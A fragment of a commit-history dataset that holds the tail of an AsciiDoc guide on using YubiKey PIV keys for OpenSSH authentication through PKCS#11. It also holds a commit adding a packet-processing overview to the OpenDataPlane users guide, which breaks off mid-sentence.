Generate a key in slot 9a (any slot should suffice):\n\n $ yubico-piv-tool -s 9a -a generate -o public.pem\n+\n[NOTE]\nRSA 4096-bit keys are not currently supported due to a limitation in the PIV spec: https:\/\/github.com\/Yubico\/yubico-piv-tool\/issues\/58\n\n2. Create a self-signed certificate for that key.\nThe only use for the X.509 certificate is to make PIV\/PKCS#11 lib happy.\nThey would want to be able to extract the public-key from the smartcard,\nand do that through the X.509 certificate.\n\n $ yubico-piv-tool -a verify-pin -a selfsign-certificate -s 9a -S \"\/CN=SSH key\/\" -i public.pem -o cert.pem\n\n3. Load the certificate:\n\n $ yubico-piv-tool -a import-certificate -s 9a -i cert.pem\n\n4. Find out where OpenSC has installed the pkcs11 module.\n\n * For OS X with binary installation this is typically in `\/Library\/OpenSC\/lib\/`. Homebrew users can use `export OPENSC_LIBS=$(brew --prefix opensc)\/lib`.\n\n * For a Debian based system this is typically in `\/usr\/lib\/x86_64-linux-gnu\/`\n+\nAfter this we'll call this location `$OPENSC_LIBS`\n\n5. Export the public key in correct format for ssh and once you got it,\nadd it to authorized_keys on the target system.\n\n $ ssh-keygen -D $OPENSC_LIBS\/opensc-pkcs11.so -e\n+\n[NOTE]\nThe command will export all keys stored on the YubiKey Neo.\nHopefully it will keep the slot order so it should be not hard to guess which\nis the public key associated with your targeted private key.\n\n6. Authenticate to the target system using the new key:\n\n $ ssh -I $OPENSC_LIBS\/opensc-pkcs11.so user@remote.example.com\n\n7. This can also be setup to work with ssh-agent: (Optional)\n\n $ ssh-add -s $OPENSC_LIBS\/opensc-pkcs11.so\n+\nNOTE: On OS X prior to macOS 10.12 \u201cSierra\u201d this typically requires installation of a third-party OpenSSH from Homebrew or the like and using that ssh-agent.\n+\nTo confirm that the ssh-agent correctly finds that key and getting the public key in correct format:\n\n $ ssh-add -L\n","old_contents":"Using PIV for SSH through PKCS11\n--------------------------------\n\nThis is a step-by-step for how to get a YubiKey with PIV to work for\npublic-key authentication with OpenSSH through PKCS11.\nPrimarily on a OS X or Linux system.\n\nPrerequisites\n-------------\n\n* a YubiKey with the PIV application loaded\n* the yubico-piv-tool software\n* the OpenSC software\n* OpenSSH\n** If you are using OSX El Capitan (10.11) or earlier, for ssh-agent to work a newer OpenSSH than is delivered with the system; macOS Sierra (10.12) contains a compatible version\n\n[NOTE]\nThe following example assume that you have not yet changed the management key. If you have changed the management key, add `--key` to the `yubico-piv-tool -a import-certificate` command below.\n\n\nSteps\n-----\n\n1. Generate a key in slot 9a (any slot should suffice):\n\n $ yubico-piv-tool -s 9a -a generate -o public.pem\n\n[NOTE]\nRSA 4096-bit keys are not currently supported due to a limitation in the PIV spec: https:\/\/github.com\/Yubico\/yubico-piv-tool\/issues\/58\n\n2. Create a self-signed certificate for that key.\nThe only use for the X.509 certificate is to make PIV\/PKCS#11 lib happy.\nThey would want to be able to extract the public-key from the smartcard,\nand do that through the X.509 certificate.\n\n $ yubico-piv-tool -a verify-pin -a selfsign-certificate -s 9a -S \"\/CN=SSH key\/\" -i public.pem -o cert.pem\n\n3. Load the certificate:\n\n $ yubico-piv-tool -a import-certificate -s 9a -i cert.pem\n\n4. Find out where OpenSC has installed the pkcs11 module.\n\n * For OS X with binary installation this is typically in `\/Library\/OpenSC\/lib\/`. Homebrew users can use `export OPENSC_LIBS=$(brew --prefix opensc)\/lib`.\n\n * For a Debian based system this is typically in `\/usr\/lib\/x86_64-linux-gnu\/`\n+\nAfter this we'll call this location `$OPENSC_LIBS`\n\n5. Export the public key in correct format for ssh and once you got it,\nadd it to authorized_keys on the target system.\n\n $ ssh-keygen -D $OPENSC_LIBS\/opensc-pkcs11.so -e\n+\n[NOTE]\nThe command will export all keys stored on the YubiKey Neo.\nHopefully it will keep the slot order so it should be not hard to guess which\nis the public key associated with your targeted private key.\n\n6. Authenticate to the target system using the new key:\n\n $ ssh -I $OPENSC_LIBS\/opensc-pkcs11.so user@remote.example.com\n\n7. This can also be setup to work with ssh-agent: (Optional)\n\n $ ssh-add -s $OPENSC_LIBS\/opensc-pkcs11.so\n+\nNOTE: On OS X prior to macOS 10.12 \u201cSierra\u201d this typically requires installation of a third-party OpenSSH from Homebrew or the like and using that ssh-agent.\n+\nTo confirm that the ssh-agent correctly finds that key and getting the public key in correct format:\n\n $ ssh-add -L\n","returncode":0,"stderr":"","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"cd636972a8c8f4f467354c96962cf5fc31a3e4de","subject":"documentation: userguide: add packet processing description","message":"documentation: userguide: add packet processing description\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Petri Savolainen <d528fd253b9aaf78fa72edbcc6249e82047f6ce6@nokia.com>\nReviewed-by Mike Holmes <mike.holmes@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,dkrot\/odp,nmorey\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,erachmi\/odp,nmorey\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,dkrot\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":":doctitle: OpenDataPlane (ODP) Users-Guide\n:description: This document is intended to guide a new OpenDataPlane +\napplication developer.\n:toc:\n\n:numbered!:\n[abstract]\nAbstract\n--------\nThis document is intended to guide a new ODP application developer.\nFurther details about ODP may be found at the http:\/\/opendataplane.org[ODP]\nhome page.\n\n.Overview of a system running ODP applications\nimage::..\/images\/overview.svg[align=\"center\"]\n\nODP is an API specification that allows many implementations to provide\nplatform independence, automatic hardware acceleration and CPU scaling to\nhigh performance networking applications. This document describes how to\nwrite an application that can successfully take advantage of the API.\n\n:numbered:\n== Introduction\n.OpenDataPlane Components\nimage::..\/images\/odp_components.svg[align=\"center\"]\n\n.The ODP API Specification\nODP consists of three separate but related component parts. First, ODP is an\nabstract API specification that describes a functional model for\ndata plane applications. This specification covers many common data plane\napplication programming needs, such as the ability to receive, manipulate, and\ntransmit packet data, without specifying how these functions are performed. This\nis quite intentional. It is precisely because ODP APIs do not have a preferred\nembodiment that they permit innovation in how these functions can\nbe realized on various platforms that offer implementations of ODP. To achieve\nthis goal, ODP APIs are described using abstract data types whose definition\nis left up to the ODP implementer. For example, in ODP packets are referenced\nby abstract handles of type +odp_packet_t+, and packet-related APIs take\narguments of this type. What an +odp_packet_t+ actually is is not part of the\nODP API specification--that is the responsibility of each ODP implementation.\n\n.Summary: ODP API attributes:\n* Open Source, open contribution, BSD-3 licensed.\n* Vendor and platform neutral.\n* Application-centric. Covers functional needs of data plane applications.\n* Ensures portability by specifying the functional behavior of ODP.\n* Defined jointly and openly by application writers and platform implementers.\n* Architected to be implementable on a wide range of platforms efficiently\n* Sponsored, governed, and maintained by the Linaro Networking Group (LNG)\n\n.ODP Implementations\nSecond, ODP consists of multiple implementations of this API specification,\neach tailored to a specific target platform. ODP implementations determine\nhow each ODP abstract type is represented on that platform and how each ODP\nAPI is realized. On some platforms, ODP APIs will\nbe realized using specialized instructions that accelerate the functional\nbehavior specified by the API. On others, hardware co-processing engines may\ncompletely offload the API so that again it can be performed with little or no\ninvolvement by a CPU. In all cases, the application sees the same\nfunctional behavior independent of how a given platform has chosen to realize\nit. By allowing each platform the freedom to determine how best to realize each\nAPI's specified functional behavior in an optimal manner, ODP permits\napplications written to its APIs to take full advantage of the unique\ncapabilities of each platform without the application programmer needing to\nhave specialist knowledge of that platform or to be concerned with how best\nto tune the application to a particular platform. This latter consideration is\nparticularly important in Network Function Virtualization (NFV) environments\nwhere the application will run on a target platform chosen by someone else.\n\n.Summary: ODP Implementation Characteristics\n* One size does not fit all--supporting multiple implementations allows ODP\nto adapt to widely differing internals among platforms.\n* Anyone can create an ODP implementation tailored to their platform\n* Distribution and maintenance of each implementation is as owner wishes\n - Open source or closed source as business needs determine\n - Have independent release cycles and service streams\n* Allows HW and SW innovation in how ODP APIs are implemented on each platform.\n\n.Reference Implementations\nTo make it easy to get started with implementing ODP on a new platform, ODP\nsupplies a number of _reference implementations_ that can serve as a\nstarting point. The two primary references implementations supplied by ODP are\n*odp-linux* and *odp-dpdk*\n\n.odp-linux\nThe *odp-linux* reference implementation is a pure SW implementation of the\nODP API that relies only on the Linux programming API. As a functional model\nfor ODP, it enables ODP to be bootstrapped easily to any platform that\nsupports a Linux kernel.\n\n.odp-dpdk\nThe *odp-dpdk* reference implementation is a pure SW implementation of the\nODP API that uses http:\/\/dpdk.org[DPDK] as a SW accelerator. In particular,\n*odp-dpdk* offers superior I\/O performance for systems that use NICs, allowing\nODP applications to take immediate full advantage of the various NIC device\ndrivers supported by DPDK.\n\n.Summary: ODP Reference Implementations\n* Open source, open contribution, BSD-3 licensed.\n* Provide easy bootstrapping of ODP onto new platforms\n* Implementers free to borrow or tailor code as needed for their platform\n* Implementers retain full control over their implementations whether or not\nthey are derived from a reference implementation.\n\n.ODP Validation Test Suite\nThird, to ensure consistency between different ODP implementations, ODP\nconsists of a validation suite that verifies that any given implementation of\nODP faithfully provides the specified functional behavior of each ODP API.\nAs a separate open source component, the validation suite may be used by\napplication writers, system integrators, and platform providers alike to\nconfirm that any purported implementation of ODP does indeed conform to the\nODP API specification.\n\n.Summary: ODP Validation Test Suite\n* Synchronized with ODP API specification\n* Maintained and distributed by LNG\n* Open source, open contribution, BSD-3 licensed.\n* Key to ensuring application portability across all ODP implementations\n* Tests that ODP implementations conform to the specified functional behavior\nof ODP APIs.\n* Can be run at any time by users and vendors to validate implementations\nof ODP.\n\n=== ODP API Specification Versioning\nAs an evolving standard, the ODP API specification is released under an\nincrementing version number, and corresponding implementations of ODP, as well\nas the validation suite that verifies API conformance, are linked to this\nversion number. ODP versions are specified using a standard three-level\nnumber (major.minor.fixlevel) that are incremented according to the degree of\nchange the level represents. Increments to the fix level represent clarification\nof the specification or other minor changes that do not affect either the\nsyntax or semantics of the specification. Such changes in the API specification\nare expected to be rare. Increments to the minor level\nrepresent the introduction of new APIs or functional capabilities, or changes\nto he specified syntax or functional behavior of APIs and thus may require\napplication source code changes. Such changes are well documented in the\nrelease notes for each revision of the specification. Finally, increments to\nthe major level represent significant structural changes that most likely\nrequire some level of application source code change, again as documented in\nthe release notes for that version.\n\n=== ODP Implementation Versioning\nODP implementations are free to use whatever release naming\/numbering\nconventions they wish, as long as it is clear what level of the ODP API a given\nrelease implements. A recommended convention is to use the same three level\nnumbering scheme where the major and minor numbers correspond to the ODP API\nlevel and the fix level represents an implementation-defined service level\nassociated with that API level implementation. The LNG-supplied ODP reference\nimplementations follow this convention.\n\n=== ODP Validation Test Suite Versioning\nThe ODP validation test suite follows these same naming conventions. The major\nand minor release numbers correspond to the ODP API level that the suite\nvalidates and the fix level represents the service level of the validation\nsuite itself for that API level.\n\n=== ODP Design Goals\nODP has three primary goals that follow from its component structure. The first\nis application portability across a wide range of platforms. These platforms\ndiffer in terms of processor instruction set architecture, number and types of\napplication processing cores, memory organization, as well as the number and\ntype of platform specific hardware acceleration and offload features that\nare available. ODP applications can move from one conforming implementation\nto another with at most a recompile.\n\nSecond, ODP is designed to permit data plane applications to avail themselves\nof platform-specific features, including specialized hardware accelerators,\nwithout specialized programming. This is achieved by separating the API\nspecification from their implementation on individual platforms. Since each\nplatform implements each ODP API in a manner optimal to that platform,\napplications automatically gain the benefit of such optimizations without the\nneed for explicit programming.\n\nThird, ODP is designed to allow applications to scale out automatically to\nsupport many core architectures. This is done using an event based programming\nmodel that permits applications to be written to be independent of the number\nof processing cores that are available to realize application function. The\nresult is that an application written to this model does not require redesign\nas it scales from 4, to 40, to 400 cores.\n\n== Organization of this Document\nThis document is organized into several sections. The first presents a high\nlevel overview of the ODP API component areas and their associated abstract\ndata types. This section introduces ODP APIs at a conceptual level.\nThe second provides a tutorial on the programming model(s)\nsupported by ODP, paying particular attention to the event model as this\nrepresents the preferred structure for most ODP applications. This section\nbuilds on the concepts introduced in the first section and shows how ODP\napplications are structured to best realize the three ODP design goals\nmentioned earlier. The third section provides a more detailed overview of\nthe major ODP API components and is designed to serve as a companion to the\nfull reference specification for each API. The latter is intended to be used\nby ODP application programmers, as well as implementers, to understand the\nprecise syntax and semantics of each API.\n\n== ODP API Concepts\nODP programs are built around several conceptual structures that every\napplication programmer needs to be familiar with to use ODP effectively. The\nmain ODP concepts are:\nThread, Event, Queue, Pool, Shared Memory, Buffer, Packet, PktIO, Time, Timer,\nand Synchronizer.\n\n=== Thread\nThe thread is the fundamental programming unit in ODP. ODP applications are\norganized into a collection of threads that perform the work that the\napplication is designed to do. ODP threads may or may not share memory with\nother threads--that is up to the implementation. Threads come in two \"flavors\":\ncontrol and worker, that are represented by the abstract type\n+odp_thread_type_t+.\n\nA control thread is a supervisory thread that organizes\nthe operation of worker threads. Worker threads, by contrast, exist to\nperform the main processing logic of the application and employ a run to\ncompletion model. Worker threads, in particular, are intended to operate on\ndedicated processing cores, especially in many core processing environments,\nhowever a given implementation may multitask multiple threads on a single\ncore if desired (typically on smaller and lower performance target\nenvironments).\n\nIn addition to thread types, threads have associated _attributes_ such as\n_thread mask_ and _scheduler group_ that determine where they can run and\nthe type of work that they can handle. These will be discussed in greater\ndetail later.\n\n=== Event\nEvents are what threads process to perform their work. Events can represent\nnew work, such as the arrival of a packet that needs to be processed, or they\ncan represent the completion of requests that have executed asynchronously.\nEvents can also represent notifications of the passage of time, or of status\nchanges in various components of interest to the application. Events have an\nevent type that describes what it represents. Threads can create new events\nor consume events processed by them, or they can perform some processing on\nan event and then pass it along to another component for further processing.\nReferences to events are via handles of abstract type +odp_event_t+. Cast\nfunctions are provided to convert these into specific handles of the\nappropriate type represented by the event.\n\n=== Queue\nA queue is a message passing channel that holds events. Events can be\nadded to a queue via enqueue operations or removed from a queue via dequeue\noperations. The endpoints of a queue will vary depending on how it is used.\nQueues come in two major types: polled and scheduled, which will be\ndiscussed in more detail when the event model is introduced. Queues may also\nhave an associated context, which represents a persistent state for all\nevents that make use of it. These states are what permit threads to perform\nstateful processing on events as well as stateless processing.\n\nQueues are represented by handles of abstract type +odp_queue_t+.\n\n=== Pool\nA pool is a shared memory area from which elements may be drawn. Pools\nrepresent the backing store for events, among other things. Pools are\ntypically created and destroyed by the application during initialization and\ntermination, respectively, and then used during processing. Pools may be\nused by ODP components exclusively, by applications exclusively, or their\nuse may be shared between the two. Pools have an associated type that\ncharacterizes the elements that they contain. The two most important pool types\nare Buffer and Packet.\n\nPools are represented by handles of abstract type +odp_pool_t+.\n\n=== Shared Memory\nShared memory represents raw blocks of storage that are sharable between\nthreads. They are the building blocks of pools but can be used directly by\nODP applications if desired.\n\nShared memory is represented by handles of abstract type +odp_shm_t+.\n\n=== Buffer\nA buffer is a fixed sized block of shared storage that is used by ODP\ncomponents and\/or applications to realize their function. Buffers contain\nzero or more bytes of application data as well as system maintained\nmetadata that provide information about the buffer, such as its size or the\npool it was allocated from. Metadata is an important ODP concept because it\nallows for arbitrary amounts of side information to be associated with an\nODP object. Most ODP objects have associated metadata and this metadata is\nmanipulated via accessor functions that act as getters and setters for\nthis information. Getter access functions permit an application to read\na metadata item, while setter access functions permit an application to write\na metadata item. Note that some metadata is inherently read only and thus\nno setter is provided to manipulate it. When object have multiple metadata\nitems, each has its own associated getter and\/or setter access function to\ninspect or manipulate it.\n\nBuffers are represented by handles of abstract type +odp_buffer_t+.\n\n=== Packet\nPackets are received and transmitted via I\/O interfaces and represent\nthe basic data that data plane applications manipulate.\nPackets are drawn from pools of type +ODP_POOL_PACKET+.\nUnlike buffers, which are simple objects,\nODP packets have a rich set of semantics that permit their inspection\nand manipulation in complex ways to be described later. Packets also support\na rich set of metadata as well as user metadata. User metadata permits\napplications to associate an application-determined amount of side information\nwith each packet for its own use.\n\nPackets are represented by handles of abstract type +odp_packet_t+.\n\n=== PktIO\nPktIO is how ODP represents I\/O interfaces. A pktio object is a logical\nport capable of receiving and\/or transmitting packets. This may be directly\nsupported by the underlying platform as an integrated feature,\nor may represent a device attached via a PCIE or other bus.\n\nPktIOs are represented by handles of abstract type +odp_pktio_t+.\n\n=== Time\nThe time API is used to measure time intervals and track time flow of an\napplication and presents a convenient way to get access to a time source.\nThe time API consists of two main parts: local time API and global time API.\n\n==== Local time\nThe local time API is designed to be used within one thread and can be faster\nthan the global time API. The local time API cannot be used between threads as\ntime consistency is not guaranteed, and in some cases that's enough.\nSo, local time stamps are local to the calling thread and must not be shared\nwith other threads. Current local time can be read with +odp_time_local()+.\n\n==== Global time\nThe global time API is designed to be used for tracking time between threads.\nSo, global time stamps can be shared between threads. Current global time can\nbe read with +odp_time_global()+.\n\nBoth, local and global time is not wrapped during the application life cycle.\nThe time API includes functions to operate with time, such as +odp_time_diff()+,\n+odp_time_sum()+, +odp_time_cmp()+, conversion functions like\n+odp_time_to_ns()+, +odp_time_local_from_ns()+, +odp_time_global_from_ns()+.\nTo get rate of time source +odp_time_local_res()+, +odp_time_global_res()+\nare used. To wait, +odp_time_wait_ns()+ and +odp_time_wait_until()+ are used,\nduring witch a thread potentially busy loop the entire wait time.\n\nThe +odp_time_t+ opaque type represents local or global timestamps.\n\n=== Timer\nTimers are how ODP applications measure and respond to the passage of time.\nTimers are drawn from specialized pools called timer pools that have their\nown abstract type (+odp_timer_pool_t+). Applications may have many timers\nactive at the same time and can set them to use either relative or absolute\ntime. When timers expire they create events of type +odp_timeout_t+, which\nserve as notifications of timer expiration.\n\n=== Synchronizer\nMultiple threads operating in parallel typically require various\nsynchronization services to permit them to operate in a reliable and\ncoordinated manner. ODP provides a rich set of locks, barriers, and similar\nsynchronization primitives, as well as abstract types for representing various\ntypes of atomic variables. The ODP event model also makes use of queues to\navoid the need for explicit locking in many cases. This will be discussed\nin the next section.\n\n== ODP Components ==\nBuilding on ODP concepts, ODP offers several components that relate to the\nflow of work through an ODP application. These include the Classifier,\nScheduler, and Traffic Manager. These components relate to the three\nmain stages of packet processing: Receive, Process, and Transmit.\n\n=== Classifier\nThe *Classifier* provides a suite of APIs that control packet receive (RX)\nprocessing.\n\n.ODP Receive Processing with Classifier\nimage::..\/images\/odp_rx_processing.svg[align=\"center\"]\n\nThe classifier provides two logically related services:\n[horizontal]\nPacket parsing:: Verifying and extracting structural information from a\nreceived packet.\n\nPacket classification:: Applying *Pattern Matching Rules (PMRs)* to the\nparsed results to assign an incoming packet to a *Class of Service (CoS)*.\n\nCombined, these permit incoming packets to be sorted into *flows*, which are\nlogically related sequences of packets that share common processing\nrequirements. While many data plane applications perform stateless packet\nprocessing (_e.g.,_ for simple forwarding) others perform stateful packet\nprocessing. Flows anchor state information relating to these groups of\npackets.\n\nA CoS determines two variables for packets belonging to a flow:\n[list]\n* The pool that they will be stored in on receipt\n* The queue that they will be added to for processing\n\nThe PMRs supported by ODP permit flow determination based on combinations of\npacket field values (tuples). The main advantage of classification is that on\nmany platforms these functions are performed in hardware, meaning that\nclassification occurs at line rate as packets are being received without\nany explicit processing by the ODP application.\n\nNote that the use of the classifier is optional. Applications may directly\nreceive packets from a corresponding PktIO input queue via direct polling\nif they choose.\n\n=== Scheduler\nThe *Scheduler* provides a suite of APIs that control scalable event\nprocessing.\n\n.ODP Scheduler and Event Processing\nimage::..\/images\/odp_scheduling.svg[align=\"center\"]\n\nThe Scheduler is responsible for selecting and dispatching one or more events\nto a requesting thread. Event selection is based on several factors involving\nboth the queues containing schedulable events and the thread making an\n+odp_schedule()+ or +odp_schedule_multi()+ call.\n\nODP queues have a _scheduling priority_ that determines how urgently events\non them should be processed relative to events contained in other queues.\nQueues also have a _scheduler group id_ associated with them that must match\nthe associated scheduler group _thread mask_ of the thread calling the\nscheduler. This permits events to be grouped for processing into classes and\nhave threads that are dedicated to processing events from specified classes.\nThreads can join and leave scheduler groups dynamically, permitting easy\napplication response to increases in demand.\n\nWhen a thread receives an event from the scheduler, it in turn can invoke\nother processing engines via ODP APIs (_e.g.,_ crypto processing) that\ncan operate asynchronously. When such processing is complete, the result is\nthat a *completion event* is added to a schedulable queue where it can be\nscheduled back to a thread to continue processing with the results of the\nrequested asynchronous operation.\n\nThreads themselves can enqueue events to queues for downstream processing\nby other threads, permitting flexibility in how applications structure\nthemselves to maximize concurrency.\n\n=== Traffic Manager\nThe *Traffic Manager* provides a suite of APIs that control traffic shaping and\nQuality of Service (QoS) processing for packet output.\n\n.ODP Transmit processing with Traffic Manager\nimage::..\/images\/odp_traffic_manager.svg[align=\"center\"]\n\nThe final stage of packet processing is to transmit it. Here, applications have\nseveral choices. As with RX processing, applications may send packets\ndirectly to PktIO TX queues for direct transmission. Often, however,\napplications need to perform traffic shaping and related\n*Quality of Service (QoS)* processing on the packets comprising a flow as part\nof transmit processing. To handle this need, ODP provides a suite of\n*Traffic Manager* APIs that permit programmatic establishment of arbiters,\nshapers, etc. that control output packet processing to achieve desired QoS\ngoals. Again, the advantage here is that on many platforms traffic management\nfunctions are implemented in hardware, permitting transparent offload of\nthis work.\n\n== ODP Application Programming\nAt the highest level, an *ODP Application* is a program that uses one or more\nODP APIs. Because ODP is a framework rather than a programming environment,\napplications are free to also use other APIs that may or may not provide the\nsame portability characteristics as ODP APIs.\n\nODP applications vary in terms of what they do and how they operate, but in\ngeneral all share the following characteristics:\n\n. They are organized into one or more _threads_ that execute in parallel.\n. These threads communicate and coordinate their activities using various\n_synchronization_ mechanisms.\n. They receive packets from one or more _packet I\/O interfaces_.\n. They examine, transform, or otherwise process packets.\n. They transmit packets to one or more _packet I\/O interfaces_.\n\nODP provides APIs to assist in each of these areas.\n\n=== The include structure\nApplications only include the 'include\/odp.h' file, which includes the\n'platform\/<implementation name>\/include\/odp' files to provide a complete\ndefinition of the API on that platform. The doxygen documentation defining\nthe behavior of the ODP API is all contained in the public API files, and the\nactual definitions for an implementation will be found in the per platform\ndirectories. Per-platform data that might normally be a +#define+ can be\nrecovered via the appropriate access function if the #define is not directly\nvisible to the application.\n\n.Users include structure\n----\n.\/\n\u251c\u2500\u2500 include\/\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 odp\/\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 api\/\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 The Public API and the documentation.\n\u2502\u00a0\u00a0 \u2502\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 odp.h This file should be the only file included by the application.\n----\n\n=== Initialization\nIMPORTANT: ODP depends on the application to perform a graceful shutdown,\ncalling the terminate functions should only be done when the application is\nsure it has closed the ingress and subsequently drained all queues, etc.\n\n=== Startup\nThe first API that must be called by an ODP application is 'odp_init_global()'.\nThis takes two pointers. The first, +odp_init_t+, contains ODP initialization\ndata that is platform independent and portable, while the second,\n+odp_platform_init_t+, is passed unparsed to the implementation\nto be used for platform specific data that is not yet, or may never be\nsuitable for the ODP API.\n\nCalling odp_init_global() establishes the ODP API framework and MUST be\ncalled before any other ODP API may be called. Note that it is only called\nonce per application. Following global initialization, each thread in turn\ncalls 'odp_init_local()' is called. This establishes the local ODP thread\ncontext for that thread and MUST be called before other ODP APIs may be\ncalled by that thread.\n\n=== Shutdown\nShutdown is the logical reverse of the initialization procedure, with\n'odp_term_local()' called for each thread before 'odp_term_global()' is\ncalled to terminate ODP.\n\n.ODP Application Structure Flow Diagram\nimage::..\/images\/resource_management.svg[align=\"center\"]\n\n== Common Conventions\nMany ODP APIs share common conventions regarding their arguments and return\ntypes. This section highlights some of the more common and frequently used\nconventions.\n\n=== Handles and Special Designators\nODP resources are represented via _handles_ that have abstract type\n_odp_resource_t_. So pools are represented by handles of type +odp_pool_t+,\nqueues by handles of type +odp_queue_t+, etc. Each such type\nhas a distinguished type _ODP_RESOURCE_INVALID_ that is used to indicate a\nhandle that does not refer to a valid resource of that type. Resources are\ntypically created via an API named _odp_resource_create()_ that returns a\nhandle of type _odp_resource_t_ that represents the created object. This\nreturned handle is set to _ODP_RESOURCE_INVALID_ if, for example, the\nresource could not be created due to resource exhaustion. Invalid resources\ndo not necessarily represent error conditions. For example, +ODP_EVENT_INVALID+\nin response to an +odp_queue_deq()+ call to get an event from a queue simply\nindicates that the queue is empty.\n\n=== Addressing Scope\nUnless specifically noted in the API, all ODP resources are global to the ODP\napplication, whether it runs as a single process or multiple processes. ODP\nhandles therefore have common meaning within an ODP application but have no\nmeaning outside the scope of the application.\n\n=== Resources and Names\nMany ODP resource objects, such as pools and queues, support an\napplication-specified character string _name_ that is associated with an ODP\nobject at create time. This name serves two purposes: documentation, and\nlookup. The lookup function is particularly useful to allow an ODP application\nthat is divided into multiple processes to obtain the handle for the common\nresource.\n\n== Queues\nQueues are the fundamental event sequencing mechanism provided by ODP and all\nODP applications make use of them either explicitly or implicitly. Queues are\ncreated via the 'odp_queue_create()' API that returns a handle of type\n+odp_queue_t+ that is used to refer to this queue in all subsequent APIs that\nreference it. Queues have one of two ODP-defined _types_, POLL, and SCHED that\ndetermine how they are used. POLL queues directly managed by the ODP\napplication while SCHED queues make use of the *ODP scheduler* to provide\nautomatic scalable dispatching and synchronization services.\n\n.Operations on POLL queues\n[source,c]\n----\nodp_queue_t poll_q1 = odp_queue_create(\"poll queue 1\", ODP_QUEUE_TYPE_POLL, NULL);\nodp_queue_t poll_q2 = odp_queue_create(\"poll queue 2\", ODP_QUEUE_TYPE_POLL, NULL);\n...\nodp_event_t ev = odp_queue_deq(poll_q1);\n...do something\nint rc = odp_queue_enq(poll_q2, ev);\n----\n\nThe key distinction is that dequeueing events from POLL queues is an\napplication responsibility while dequeueing events from SCHED queues is the\nresponsibility of the ODP scheduler.\n\n.Operations on SCHED queues\n[source,c]\n----\nodp_queue_param_t qp;\nodp_queue_param_init(&qp);\nodp_schedule_prio_t prio = ...;\nodp_schedule_group_t sched_group = ...;\nqp.sched.prio = prio;\nqp.sched.sync = ODP_SCHED_SYNC_[NONE|ATOMIC|ORDERED];\nqp.sched.group = sched_group;\nqp.lock_count = n; \/* Only relevant for ordered queues *\/\nodp_queue_t sched_q1 = odp_queue_create(\"sched queue 1\", ODP_QUEUE_TYPE_SCHED, &qp);\n\n...thread init processing\n\nwhile (1) {\n odp_event_t ev;\n odp_queue_t which_q;\n ev = odp_schedule(&which_q, <wait option>);\n ...process the event\n}\n----\n\nWith scheduled queues, events are sent to a queue, and the the sender chooses\na queue based on the service it needs. The sender does not need to know\nwhich ODP thread (on which core) or hardware accelerator will process\nthe event, but all the events on a queue are eventually scheduled and processed.\n\nAs can be seen, SCHED queues have additional attributes that are specified at\nqueue create that control how the scheduler is to process events contained\non them. These include group, priority, and synchronization class.\n\n=== Scheduler Groups\nThe scheduler's dispatching job is to return the next event from the highest\npriority SCHED queue that the caller is eligible to receive events from.\nThis latter consideration is determined by the queues _scheduler group_, which\nis set at queue create time, and by the caller's _scheduler group mask_ that\nindicates which scheduler group(s) it belongs to. Scheduler groups are\nrepresented by handles of type +odp_scheduler_group_t+ and are created by\nthe *odp_scheduler_group_create()* API. A number of scheduler groups are\n_predefined_ by ODP. These include +ODP_SCHED_GROUP_ALL+ (all threads),\n+ODP_SCHED_GROUP_WORKER+ (all worker threads), and +ODP_SCHED_GROUP_CONTROL+\n(all control threads). The application is free to create additional scheduler\ngroups for its own purpose and threads can join or leave scheduler groups\nusing the *odp_scheduler_group_join()* and *odp_scheduler_group_leave()* APIs\n\n=== Scheduler Priority\nThe +prio+ field of the +odp_queue_param_t+ specifies the queue's scheduling\npriority, which is how queues within eligible scheduler groups are selected\nfor dispatch. Queues have a default scheduling priority of NORMAL but can be\nset to HIGHEST or LOWEST according to application needs.\n\n=== Scheduler Synchronization\nIn addition to its dispatching function, which provide automatic scalability to\nODP applications in many core environments, the other main function of the\nscheduler is to provide event synchronization services that greatly simplify\napplication programming in a parallel processing environment. A queue's\nSYNC mode determines how the scheduler handles the synchronization processing\nof multiple events originating from the same queue.\n\nThree types of queue scheduler synchronization area supported: Parallel,\nAtomic, and Ordered.\n\n==== Parallel Queues\nSCHED queues that specify a sync mode of ODP_SCHED_SYNC_NONE are unrestricted\nin how events are processed.\n\n.Parallel Queue Scheduling\nimage::..\/images\/parallel_queue.svg[align=\"center\"]\n\nAll events held on parallel queues are eligible to be scheduled simultaneously\nand any required synchronization between them is the responsibility of the\napplication. Events originating from parallel queues thus have the highest\nthroughput rate, however they also potentially involve the most work on the\npart of the application. In the Figure above, four threads are calling\n*odp_schedule()* to obtain events to process. The scheduler has assigned\nthree events from the first queue to three threads in parallel. The fourth\nthread is processing a single event from the third queue. The second queue\nmight either be empty, of lower priority, or not in a scheduler group matching\nany of the threads being serviced by the scheduler.\n\n=== Atomic Queues\nAtomic queues simplify event synchronization because only a single thread may\nprocess event(s) from a given atomic queue at a time. Events scheduled from\natomic queues thus can be processed lock free because the locking is being\ndone implicitly by the scheduler. Note that the caller may receive one or\nmore events from the same atomic queue if *odp_schedule_multi()* is used. In\nthis case these multiple events all share the same atomic scheduling context.\n\n.Atomic Queue Scheduling\nimage::..\/images\/atomic_queue.svg[align=\"center\"]\n\nIn this example, no matter how many events may be held in an atomic queue,\nonly one calling thread can receive scheduled events from it at a time. Here\ntwo threads process events from two different atomic queues. Note that there\nis no synchronization between different atomic queues, only between events\noriginating from the same atomic queue. The queue context associated with the\natomic queue is held until the next call to the scheduler or until the\napplication explicitly releases it via a call to\n*odp_schedule_release_atomic()*.\n\nNote that while atomic queues simplify programming, the serial nature of\natomic queues may impair scaling.\n\n=== Ordered Queues\nOrdered queues provide the best of both worlds by providing the inherent\nscaleabilty of parallel 